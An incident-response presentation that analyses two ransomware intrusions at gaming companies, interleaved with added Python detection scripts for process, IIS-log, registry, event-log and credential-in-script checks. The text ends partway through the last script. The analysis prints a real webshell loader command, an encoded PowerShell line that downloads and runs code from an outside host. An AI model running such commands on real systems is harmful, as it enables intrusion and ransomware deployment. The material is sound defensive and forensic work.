©2022 NetWitness or its affiliates. All rights reserved.
"Insert coin to continue... "
Ransomware in the gaming industry
Stefano Maccaglia
Practice Manager, Incident Response
Who I Am: Stefano
• I am the Practice Manager of NetWitness (RSA) Incident Response.
• I began my ICT career in 1997 at Digital Corp, but I started cracking software in 1985 on a Commodore C64.
• I decided to leave the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career…
• I worked on the offensive side until 2009, when I jumped on the IR bandwagon.
• Since then, I have led engagements around the world investigating sophisticated actors.
Agenda
❑ Introduction
❑ The first case
❑ Initial Compromise
❑ Second Phase, Second Actor
❑ Third Phase
❑ Ransomware in play
❑ The outcome
❑ The second case
❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lesson learned
The First Case
Initial Compromise
▪ Through an active exploit of the Exchange Web Server, two webshells were uploaded to DC1-EXCH01 on December 9, 2021.
[Diagram: Munich Data Center with DC1-EXCH00 and DC1-EXCH01; attacker source 23.183.81.113; webshells Logout.aspx and iisstart.aspx on DC1-EXCH01. The Exchange server version was 2019 CU10.]
Evidence of Initial Attack
▪ The proximity of the file creation times (a few milliseconds apart) in different paths confirms that the webshells were dropped through an exploit with chained payloads.
▪ Web log retention on the server was 30 days, so the logs had rolled over before the investigation started, but the webshells were likely uploaded via the exploit of CVE-2021-42321, an RCE, based on the folders used to drop them.
[Figure: the first webshell, a basic loader; the second webshell, with functions to interact with files; timestomped dates.]
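The two observations above (files created a few milliseconds apart in different paths, and timestomped dates) can be checked mechanically. The following Python script is an added example, not part of the slides: it runs over constructed MFT-style records whose paths and timestamps are placeholders (the slides do not name the real folders), and compares the $STANDARD_INFORMATION and $FILE_NAME creation times the way an analyst would when looking for timestomping and for a single write burst spread over several directories.

```python
from datetime import datetime, timedelta

# Constructed MFT-style records. Paths are placeholders (the slides do not name
# the real folders); the timestamps are made up to mirror the pattern described:
# two files a few milliseconds apart in different directories, one of them with
# its $STANDARD_INFORMATION creation time rewritten to an older date.
RECORDS = [
    {"path": r"C:\inetpub\wwwroot\<folder-A>\Logout.aspx",
     "si_created": "2021-12-09T14:03:21.117", "fn_created": "2021-12-09T14:03:21.117"},
    {"path": r"C:\inetpub\wwwroot\<folder-B>\iisstart.aspx",
     "si_created": "2019-03-15T08:00:00.000", "fn_created": "2021-12-09T14:03:21.130"},
    # A legitimate deployment also writes files in a burst, but into one directory.
    {"path": r"C:\inetpub\wwwroot\<folder-A>\web.config",
     "si_created": "2021-06-01T09:12:00.250", "fn_created": "2021-06-01T09:12:00.250"},
    {"path": r"C:\inetpub\wwwroot\<folder-A>\global.asax",
     "si_created": "2021-06-01T09:12:00.340", "fn_created": "2021-06-01T09:12:00.340"},
]


def parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def timestomp_candidates(records, tolerance=timedelta(seconds=1)):
    """$SI creation older than $FN creation (beyond `tolerance`) is the classic
    sign of timestomping: $SI is writable through SetFileTime, $FN normally is not."""
    return [r for r in records
            if parse(r["fn_created"]) - parse(r["si_created"]) > tolerance]


def creation_clusters(records, window=timedelta(milliseconds=500)):
    """Groups of files whose $FN creation times lie within `window` of the previous
    file in the group *and* that span more than one directory: one write burst,
    several paths, which is what a chained exploit payload leaves behind."""
    if not records:
        return []
    ordered = sorted(records, key=lambda r: parse(r["fn_created"]))
    groups, current = [], [ordered[0]]
    for r in ordered[1:]:
        if parse(r["fn_created"]) - parse(current[-1]["fn_created"]) <= window:
            current.append(r)
        else:
            groups.append(current)
            current = [r]
    groups.append(current)
    return [[r["path"] for r in g] for g in groups
            if len(g) > 1 and len({dirname(r["path"]) for r in g}) > 1]


if __name__ == "__main__":
    print("timestomped:", [r["path"] for r in timestomp_candidates(RECORDS)])
    print("write bursts across directories:", creation_clusters(RECORDS))
```

Using the $FN time for clustering is deliberate: it is the timestamp the attacker did not rewrite, so the two webshells still group together even though one of them was backdated.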
CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to issues with the validation of command-let (cmdlet) arguments.
▪ In order to exploit this flaw, an attacker would need to be authenticated.
▪ The attack requires the execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful.
We never leaked credentials…
▪ The attacker authenticated by leveraging leaked credentials of a subcontractor working as a developer in the environment.
“Yeah, that account is mine, but it is a personal account… what is the meaning of this?... And how did you collect it???”
Logout.aspx Webshell
▪ This webshell is extremely simple: it makes the IIS worker process (w3wp.exe) spawn the Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe).
Command line:
    "cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
Decoded:
    IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
Webshell Logic of iisstart.aspx
▪ The second webshell allows the attacker to interact with the system through requests containing the parameter cadataKey.
▪ If the cadataKey parameter is not specified, the webshell redirects to the errorFE.aspx page, returning an HTTP 404 code.
▪ The webshell included the ability to run arbitrary commands and to upload, delete, and view the contents of files.
▪ Once implanted, the webshell allowed the attacker to access the environment with local administration rights.
▪ All commands specified through this parameter are executed through an eval statement.
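The two webshells leave two different traces a defender can look for: the process chain w3wp.exe → cmd.exe → powershell.exe with an encoded command, and HTTP requests carrying the cadataKey parameter. The Python script below is an added example, not from the slides: it triages constructed process-creation events (in the shape of EDR or Sysmon Event ID 1 records) and a constructed IIS W3C log excerpt. Only the webshell names, the encoded command and the source IP come from the slides; the /owa/auth/ folder, the hostnames and the other log lines are assumptions. Note that the slide's loader passes plain ASCII base64 to -e, while PowerShell normally expects UTF-16LE, so the decoder checks which encoding it is looking at instead of assuming one.

```python
import base64
import shlex
from urllib.parse import parse_qs

# --- Part 1: process-creation telemetry (constructed, not real records) -------
ENCODED_FROM_SLIDE = (
    "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3"
    "RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk="
)
PROCESS_EVENTS = [
    {"host": "DC1-EXCH01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": '"cmd.exe" /c powershell -ep bypass -e ' + ENCODED_FROM_SLIDE},
    {"host": "DC1-EXCH01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": '"cmd.exe" /c whoami'},
    # User-launched encoded command (UTF-16LE, as PowerShell expects): lower confidence.
    {"host": "WKS-042", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -e "
                + base64.b64encode("Write-Host 'hi'".encode("utf-16le")).decode()},
]
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_encoded_argument(cmdline: str):
    """Base64 after -e / -enc / -EncodedCommand (any unique prefix), or None."""
    tokens = shlex.split(cmdline, posix=False)  # non-POSIX keeps Windows backslashes
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """UTF-16LE when every high byte is zero (PowerShell's own format), else ASCII."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def triage_process_events(events):
    findings = []
    for ev in events:
        reasons = []
        if basename(ev["parent"]) in WEB_WORKERS and basename(ev["image"]) in SHELLS:
            reasons.append("IIS worker process spawned a command shell")
        enc = extract_encoded_argument(ev["cmdline"])
        if enc:
            reasons.append("encoded PowerShell command")
        if reasons:
            findings.append({"host": ev["host"], "reasons": reasons,
                             "severity": "high" if len(reasons) == 2 else "medium",
                             "decoded": decode_encoded_command(enc) if enc else None})
    return findings


# --- Part 2: IIS W3C log (constructed; /owa/auth/ is an assumed folder) ---------
WEBSHELL_NAMES = {"iisstart.aspx", "logout.aspx"}  # names from the case; noisy alone
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-02-18 10:21:07 10.0.0.5 POST /owa/auth/iisstart.aspx cadataKey=whoami 443 - 23.183.81.113 Mozilla/5.0 200
2022-02-18 10:21:09 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 10.1.2.3 Mozilla/5.0 200
2022-02-18 10:22:40 10.0.0.5 GET /owa/auth/iisstart.aspx - 443 - 198.51.100.7 Mozilla/5.0 404
"""


def parse_w3c(text: str):
    """One dict per request, naming the columns from the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def triage_iis_log(text: str):
    hits = []
    for row in parse_w3c(text):
        query = row.get("cs-uri-query", "-")  # "-" is W3C for "empty"
        params = {k.lower() for k in parse_qs(query, keep_blank_values=True)} if query != "-" else set()
        has_key = "cadatakey" in params
        if has_key or basename(row["cs-uri-stem"]) in WEBSHELL_NAMES:
            hits.append({"when": f"{row['date']} {row['time']}", "client": row["c-ip"],
                         "stem": row["cs-uri-stem"], "status": row["sc-status"],
                         "has_cadatakey": has_key})
    return hits


if __name__ == "__main__":
    for f in triage_process_events(PROCESS_EVENTS):
        print(f)
    for h in triage_iis_log(IIS_LOG):
        print(h)
```

The parameter is the stronger of the two web signals: a request to iisstart.aspx without cadataKey that returns 404 looks exactly like the redirect the slide describes, so the name-only hit is kept but marked, and the request with the parameter from 23.183.81.113 is what an analyst would pivot on.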
Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to DC1-EXCH00 and, a few minutes later, to DC1-EXCH01.
▪ This malicious file is loaded into processes and harvests clear-text passwords in real time as various users authenticate with the Exchange server.
[Diagram: Munich Data Center; attacker source 23.183.81.113; iisstart.aspx on both Exchange servers, lsass.dll uploaded alongside it.]
▪ This long pause between the initial webshells and the subsequent activity could be due to the initial attacker selling access to the ransomware attacker.
Second Phase, Second Actor
▪ The harvested credentials are saved into a file named C:\windows\temp\tmpQWER.tmp, as User/Pass pairs.
▪ Hundreds of clear-text credentials (passwords) were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain controllers.
[Diagram: Munich Data Center Exchange servers with iisstart.aspx and lsass.dll; the credential file C:\windows\temp\tmpQWER.tmp containing User/Pass entries.]
▪ The DLL uses the NPLogonNotify API provided by Microsoft to extract clear-text credentials of users as they log into the servers.
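A DLL only receives NPLogonNotify callbacks if it is registered as a network provider in the registry, so that is where a defender can find it: the provider list under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order and each provider's ProviderPath under Services\<name>\NetworkProvider. The Python audit below is an added example, not from the slides: it parses a reg-query-style export of those keys and flags providers that are not in a baseline or whose DLL lives outside System32. The export text, the "lsass" provider key name, its Temp path and the baseline table are constructed assumptions; build the baseline from a clean image of your own build.

```python
import re

# Constructed excerpt in the layout printed by `reg query <key> /s`. The three
# Microsoft providers reflect a typical Windows server; the "lsass" provider key
# and its Temp path are made up to stand in for the DLL described on the slide.
REG_DUMP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order
    ProviderOrder    REG_SZ    RDPNP,LanmanWorkstation,webclient,lsass

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDPNP\NetworkProvider
    Name    REG_SZ    Microsoft Remote Desktop Session Host Server Network Provider
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\drprov.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider
    Name    REG_SZ    Microsoft Windows Network
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\ntlanman.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\webclient\NetworkProvider
    Name    REG_SZ    Web Client Network
    ProviderPath    REG_EXPAND_SZ    %SystemRoot%\System32\davclnt.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lsass\NetworkProvider
    Name    REG_SZ    lsass
    ProviderPath    REG_EXPAND_SZ    C:\Windows\Temp\lsass.dll
"""

# Assumed baseline (provider name -> expected DLL). Derive yours from a clean
# gold image of the same Windows build rather than trusting this table.
BASELINE = {
    "rdpnp": "%systemroot%\\system32\\drprov.dll",
    "lanmanworkstation": "%systemroot%\\system32\\ntlanman.dll",
    "webclient": "%systemroot%\\system32\\davclnt.dll",
}
ORDER_KEY = "system\\currentcontrolset\\control\\networkprovider\\order"
SYSTEM32 = "%systemroot%\\system32\\"

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\(.+)$")
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")


def parse_reg_query(text: str):
    """{key path below the hive, lowercased: {value name: data}}"""
    keys, current = {}, None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).lower()
            keys[current] = {}
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            keys[current][value.group(1)] = value.group(3).strip()
    return keys


def normalise(path: str) -> str:
    # Fold the literal system root so both spellings compare equal.
    return path.strip().lower().replace("c:\\windows", "%systemroot%")


def audit_network_providers(text: str, baseline=BASELINE):
    keys = parse_reg_query(text)
    order = keys.get(ORDER_KEY, {}).get("ProviderOrder", "")
    findings = []
    for name in (p.strip() for p in order.split(",") if p.strip()):
        key = f"system\\currentcontrolset\\services\\{name.lower()}\\networkprovider"
        path = keys.get(key, {}).get("ProviderPath")
        reasons = []
        if path is None:
            reasons.append("listed in ProviderOrder but has no ProviderPath")
        else:
            norm = normalise(path)
            if name.lower() not in baseline:
                reasons.append("provider not in baseline")
            elif norm != baseline[name.lower()]:
                reasons.append("baseline provider points at an unexpected DLL")
            if not norm.startswith(SYSTEM32):
                reasons.append("DLL loaded from outside System32")
        findings.append({"provider": name, "path": path, "reasons": reasons})
    return findings


def suspicious_providers(text: str):
    return [f["provider"] for f in audit_network_providers(text) if f["reasons"]]


if __name__ == "__main__":
    for f in audit_network_providers(REG_DUMP):
        print(f)
```

The same check works fleet-wide by collecting the export from every server and diffing against the baseline; a provider that appears on only a handful of hosts, as the Exchange servers and domain controllers did here, stands out immediately.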
Second Phase, Second Actor
▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a Remote Desktop software) on DC1-EXCH00 on 18 February 2022.
[Diagram: Munich Data Center; attacker source 23.183.81.113; atera.exe and lsass.dll alongside iisstart.aspx on the Exchange servers.]
▪ Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console.
How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage legitimate remote management agents (like Atera) to survive possible Cobalt Strike detections from the EDR and antivirus platforms.
▪ Relying upon a legitimate tool to achieve persistence is typically a pen tester approach and, in my personal perspective, this can clarify the attacker's background.
How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
[Diagram: attacker source 23.183.81.113 reaching DC1-EXCH00 (webshell, lsass.dll) and DC1-DC0001 (atera.exe, lsass.dll) in the Munich Data Center.]
▪ The Atera package was uploaded on the Domain Controller of the targeted Data Center (DC1-DC0001) together with the credential dumper “lsass.exe”.
How to Complete the Job…
▪ On March 23, the attacker uploaded lsass.dll to DC1-EXCH01.
[Diagram: Munich Data Center; attacker source 23.183.81.113; lsass.dll now on DC1-EXCH01 next to iisstart.aspx.]
▪ He immediately started the credential harvesting on this system.
Third Phase: 23 March – 5 April
▪ During this period the attacker moved laterally to various systems, including Domain Controllers, backup servers, etc.
▪ Scanning and reconnaissance on the network were executed regularly.
[Diagram: from DC1-DC0001 and DC1-EXCH00 (lsass.dll, iisstart.aspx, atera.exe) in the Munich Data Center, scanning of workstations, dev systems and the virtual infrastructure in the Munich Office.]
▪ During this scanning the attacker identified the virtual infrastructure where critical servers were operating.
Third Phase: Exfiltration
[Diagram: leaks from the Munich Data Center (DC1-DC0001, DC1-EXCH00 with lsass.dll, iisstart.aspx, atera.exe) and from DC3-SPORS2 in the Toronto Data Center towards 195.149.87.179; Munich Office also shown.]
▪ There is evidence that the attacker stole various files during this time.
Status
▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less than 24 hours he collected about 12,45 Gb of data from the environment, including lots of payment and betting details.
▪ Unfortunately, up to this point, the attacker was able to work undetected. Why?
▪ To answer, we should clarify the meaning and the role of an “Enabler of Compromise,” but let’s first see how the attack unfolded...
Ransomware in Play: RDP + PsExec ransomware distribution
Ransomware in Play…
▪ 6 April 2022: the attacker executed a massive dissemination of the ransomware executable with a combination of RDP and PsExec sessions.
[Diagram: from DC1-DC0001 (lsass.dll, atera.exe) the ransomware reaches workstations, dev systems and the virtual infrastructure in the Munich Data Center and Munich Office, and the Toronto and Macau Data Centers.]
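The RDP + PsExec fan-out described above is loud in Windows event logs if anyone is correlating them: one source opening RemoteInteractive logons (Security 4624, logon type 10) to many hosts in a short window, and a PSEXESVC service being installed (System 7045) on each target right after a network logon (4624, type 3) from that same source. The Python detector below is an added example, not from the slides, run over constructed event records; the hostnames, the 10.10.1.10 source, the user names and the thresholds are assumptions to tune for your own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events flattened from Security 4624 (logon) and System 7045 (new
# service) records: (timestamp, host, event id, logon type, user, source IP, service).
# 10.10.1.10 plays the host the attacker worked from; none of this is real data.
RAW = [
    ("2022-04-06T01:02:11", "WKS-001", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:05:40", "WKS-002", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:07:02", "WKS-003", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:09:55", "WKS-004", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:12:13", "WKS-005", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:15:30", "DEV-01", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:18:47", "FS-01", 4624, 10, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T00:50:00", "APP-02", 4624, 3, "backup_svc", "10.20.5.5", None),  # too early to explain the install
    ("2022-04-06T01:20:00", "APP-01", 4624, 3, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:20:04", "APP-01", 7045, None, None, None, "PSEXESVC"),
    ("2022-04-06T01:21:30", "APP-02", 4624, 3, "adm_ops", "10.10.1.10", None),
    ("2022-04-06T01:21:33", "APP-02", 7045, None, None, None, "PSEXESVC"),
    ("2022-04-06T08:30:00", "WKS-009", 4624, 10, "helpdesk1", "10.20.5.5", None),  # one admin, one box
    ("2022-04-06T08:35:00", "WKS-009", 7045, None, None, None, "EventLogForwarder"),
]
FIELDS = ("ts", "host", "id", "logon_type", "user", "src", "service")
EVENTS = [dict(zip(FIELDS, r)) for r in RAW]

RDP_FANOUT_THRESHOLD = 5          # distinct hosts reached over RDP ...
RDP_WINDOW = timedelta(hours=1)   # ... within this window, from one source
PSEXEC_WINDOW = timedelta(minutes=2)


def ts(ev):
    return datetime.fromisoformat(ev["ts"])


def rdp_fanout(events, threshold=RDP_FANOUT_THRESHOLD, window=RDP_WINDOW):
    """Sources with RemoteInteractive logons (type 10) to >= threshold distinct hosts inside `window`."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["id"] == 4624 and ev["logon_type"] == 10:
            by_src[ev["src"]].append((ts(ev), ev["host"]))
    alerts = {}
    for src, logons in by_src.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):   # slide the window from each logon
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= threshold:
                alerts[src] = sorted(hosts)
                break
    return alerts


def psexec_installs(events):
    """7045 events for the PSEXESVC service that PsExec installs on its target."""
    return [ev for ev in events
            if ev["id"] == 7045 and "psexesvc" in (ev["service"] or "").lower()]


def psexec_with_source(events, window=PSEXEC_WINDOW):
    """Attribute each PSEXESVC install to the latest network logon (type 3) on that
    host shortly before it: that SMB logon is how PsExec copies and starts the service."""
    net_logons = [ev for ev in events if ev["id"] == 4624 and ev["logon_type"] == 3]
    pairs = []
    for inst in psexec_installs(events):
        t_inst = ts(inst)
        candidates = [ev for ev in net_logons
                      if ev["host"] == inst["host"] and timedelta(0) <= t_inst - ts(ev) <= window]
        latest = max(candidates, key=ts) if candidates else None
        pairs.append({"host": inst["host"], "ts": inst["ts"],
                      "src": latest["src"] if latest else None,
                      "user": latest["user"] if latest else None})
    return pairs


def summarize(events):
    """Per fan-out source: the hosts it reached over RDP and the ones it PsExec'd."""
    pairs = psexec_with_source(events)
    return {src: {"rdp_targets": hosts,
                  "psexec_targets": sorted(p["host"] for p in pairs if p["src"] == src)}
            for src, hosts in rdp_fanout(events).items()}


if __name__ == "__main__":
    print(summarize(EVENTS))
```

The single helpdesk RDP session and the unrelated 7045 on WKS-009 stay below the threshold, which is the point of correlating rather than alerting on every PsExec or every RDP logon: the signal is one source touching many machines in minutes.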
Ransomware in Play…
▪ With a separate, tailored action, the attacker ensured the company's backup servers were encrypted, by leveraging another variant of the ransomware.
▪ This variant was also used against the company ESXi servers (about 50 hosts), which adversely affected around 2000 virtual machines hosted on them.
▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”.
▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them.
[Diagram: from DC1-DC0001 (atera.exe) in the Munich Data Center, ransomware distributed to the virtual infrastructure via SSH sessions; ransomware installed manually on the backup infrastructure.]
What we found: Network Forensics
▪ During the attack, the actor kept three systems untouched, in particular the Exchange server.
[Diagram: untouched systems DC1-EXCH00 (atera.exe) in the Munich Data Center, DC1-EXCH10, and DC3-SPORS2 in the Toronto Data Center.]
▪ This is probably due to the goal of keeping an eye upon the target.
▪ In fact, the victim's email system was still working despite the encryption of the remaining systems…
The Outcome
▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services, allowing the company to slowly get back to business.
▪ From the end users' perspective the attack was a significant blow to the company’s reputation and, at least initially, it impacted the overall relationship with the company’s customer base.
▪ However, the gaming world has its own rules and 45 days later it was business as usual in the company headquarters… apart from some minor, but meaningful, details:
▪ Enhanced network visibility
▪ New staff for daily monitoring of network and infrastructure…
▪ No Splashtop, TeamViewer or AnyDesk connections
▪ No scripts with hardcoded credentials
▪ New cybersecurity procedures
The Second Case
The second case: introduction
▪ This case targeted a group operating in the online casino sector with about 2.500 employees.
▪ The company has two data centers, located in Australia and Hong Kong, and operates mainly in the Asia-Pacific market.
▪ The cybersecurity practice inside the company at the time was mainly managed by one global MSSP and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong controls upon online services and data privacy.
▪ However, they left open several holes in their cybersecurity ecosystem… lots of enablers of compromise:
▪ Total lack of network visibility, both internally and in the company private cloud
▪ Lack of organized logs and limited endpoint visibility
▪ Lack of any behavior analysis at user level for internal staff
▪ Limited investigative and reactive capabilities
▪ Real-time threat detection limited to “low hanging fruits”
▪ Lack of a proper escalation plan for ICT incidents
Attack Preparation
▪ The attack was organized around a flow very similar to the first case presented, with the difference that this time the attacker targeted the staff with domain spoofing and spear-phishing.
[Diagram: attack preparation flow between the attacker, an online file-sharing service and the victim: register “company.us” to spoof “company.co.au”; create the employee@company.us email account; acquire the target’s email through OSINT and send a phishing email; send a sounding email discussing business and meetings; upload the payload, sharing it with the target; send a file-sharing notification.]
Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture.
▪ The email asked to set a time for a call the following week about the content of the email.
[Diagram, “Exotic Lily + Conti in Action”: attacker at 44.227.65.245 against the Munich Data Center. Exotic Lily: domain spoofing, spear-phishing campaign, BazarLoader, initial compromise and recon (Cobalt Strike: write, execute), download additional tools, perform command-line recon, harvest local and network credentials, Exotic Lily C2 over SSL sessions. Conti: lateral movement with PowerShell, RDP (Splashtop, AnyDesk), stolen VPN and admin credentials, RDP toward DCs, Atera package on application servers, leaks.]
No Doubt on Attribution…
It was absolutely easy to attribute the attack to the Conti ransomware gang; their banner spoke for itself:
Enablers of Compromise
Enablers of Compromise
▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider expansion of the radius and magnitude of an attack.
▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc. These protocols, if exploited, could grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers or unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker can use a myriad of tools and techniques to breach an organization’s network, steal sensitive information and compromise its operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers of successful cyber attacks.
An enabler of compromise is a pre-existing condition to the attack.
Script with Hardcoded Credentials
We found the cron script /root/inventory_queries.sh on a critical repository containing hardcoded login credentials, as illustrated here:
Also, we found cron jobs running under the root user that used a service account, including its password, in cleartext.
Enablers of compromise or careless users???
Unreported TeamViewer and AnyDesk usage
During the analysis we found several systems connected to the company network with TeamViewer and AnyDesk remote control software installed.
The presence of remote control software on systems connected to the network may provide additional access points that bypass existing security measures.
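Remote management and remote-control tools come up twice in these slides: Atera, chosen by the attacker precisely because a legitimate agent slips past detections aimed at Cobalt Strike, and the unreported TeamViewer and AnyDesk installs found here. Both are caught by the same control: an inventory of installed services checked against what the organisation has actually sanctioned. The Python check below is an added example, not from the slides; the service inventory, the approved list and the name/path markers used to recognise each product are assumptions, and the marker list is a starting point to extend from your own CMDB.

```python
# Known remote-management / remote-access products, keyed by substrings found in
# their service names or binary paths. Assumed starting list: extend it from
# the products your own CMDB and vendor documentation name.
RMM_SIGNATURES = {
    "Atera":      ("ateraagent",),
    "Splashtop":  ("splashtop",),
    "TeamViewer": ("teamviewer",),
    "AnyDesk":    ("anydesk",),
}

# (host, product) pairs the organisation has sanctioned. Constructed.
APPROVED = {("IT-ADMIN-01", "TeamViewer")}

# Constructed service inventory, in the shape of a flattened
# `Get-CimInstance Win32_Service` export from several hosts. Not real data.
INVENTORY = [
    {"host": "DC1-EXCH00", "service": "AteraAgent",
     "path": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe"},
    {"host": "DC1-EXCH00", "service": "SplashtopRemoteService",
     "path": r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe"},
    {"host": "DC1-EXCH00", "service": "W3SVC",
     "path": r"C:\Windows\System32\svchost.exe -k iissvcs"},
    {"host": "IT-ADMIN-01", "service": "TeamViewer",
     "path": r"C:\Program Files\TeamViewer\TeamViewer_Service.exe"},
    {"host": "WKS-117", "service": "AnyDesk",
     "path": r"C:\Users\jdoe\AppData\Roaming\AnyDesk\AnyDesk.exe"},
]


def identify_rmm(entry):
    """Product name if the service name or binary path matches a known marker."""
    haystack = (entry["service"] + " " + entry["path"]).lower()
    for product, markers in RMM_SIGNATURES.items():
        if any(m in haystack for m in markers):
            return product
    return None


def in_user_profile(path: str) -> bool:
    # Binaries under C:\Users\... were not deployed by the software team.
    return "\\users\\" in path.lower()


def audit_remote_access(inventory, approved=APPROVED):
    findings = []
    for entry in inventory:
        product = identify_rmm(entry)
        if product is None:
            continue
        reasons = []
        if (entry["host"], product) not in approved:
            reasons.append("not on the approved list for this host")
        if in_user_profile(entry["path"]):
            reasons.append("runs from a user profile (unmanaged install)")
        findings.append({"host": entry["host"], "product": product,
                         "service": entry["service"], "reasons": reasons})
    return findings


def unapproved_hosts(inventory, approved=APPROVED):
    """Hosts that need follow-up: at least one remote-access finding with a reason."""
    return sorted({f["host"] for f in audit_remote_access(inventory, approved) if f["reasons"]})


if __name__ == "__main__":
    for f in audit_remote_access(INVENTORY):
        print(f)
    print("follow up:", unapproved_hosts(INVENTORY))
```

An approved install produces a finding with no reasons, so the report still shows where sanctioned tools run; an Exchange server with Atera and Splashtop on it, as in the first case, shows up on the first run.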
Cracked software
During the analysis we found evidence of systems using cracked Windows licenses.
PowerShell scripts with cleartext credentials
Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
Root password in root’s .bash_history
Reviewing the logs regarding the usage of Unix systems, we stumbled upon another significant enabler of compromise…
You can notice here…
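Three of the enablers above are the same finding in three file types: a cron script with hardcoded database credentials, PowerShell scripts that build a SecureString from a plaintext literal, and a root password left in .bash_history. The Python scanner below is an added example, not from the slides, with one pattern per finding, run over constructed file contents that stand in for the screenshots (the real script bodies are not reproduced; only the path /root/inventory_queries.sh is the one named on the slide). A fourth constructed file shows the pattern that does not trigger: a secret read from a root-only file at run time.

```python
import re

# Constructed file contents standing in for the artefacts named on these slides.
# Only the first path comes from the slide; the bodies and the other paths are made up.
SAMPLE_FILES = {
    "/root/inventory_queries.sh": r"""#!/bin/bash
# nightly inventory pull
DB_USER=inventory_ro
DB_PASS='Inv3ntory!2021'
mysql -h db01 -u "$DB_USER" -p"$DB_PASS" inventory -e 'SELECT COUNT(*) FROM assets' > /var/log/inv.txt
""",
    "/opt/scripts/sync-shares.ps1": r"""$secpw = ConvertTo-SecureString "Sh4reSync#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("CORP\svc_sync", $secpw)
Copy-Item -Path \\fs01\exports -Destination D:\mirror -Credential $cred -Recurse
""",
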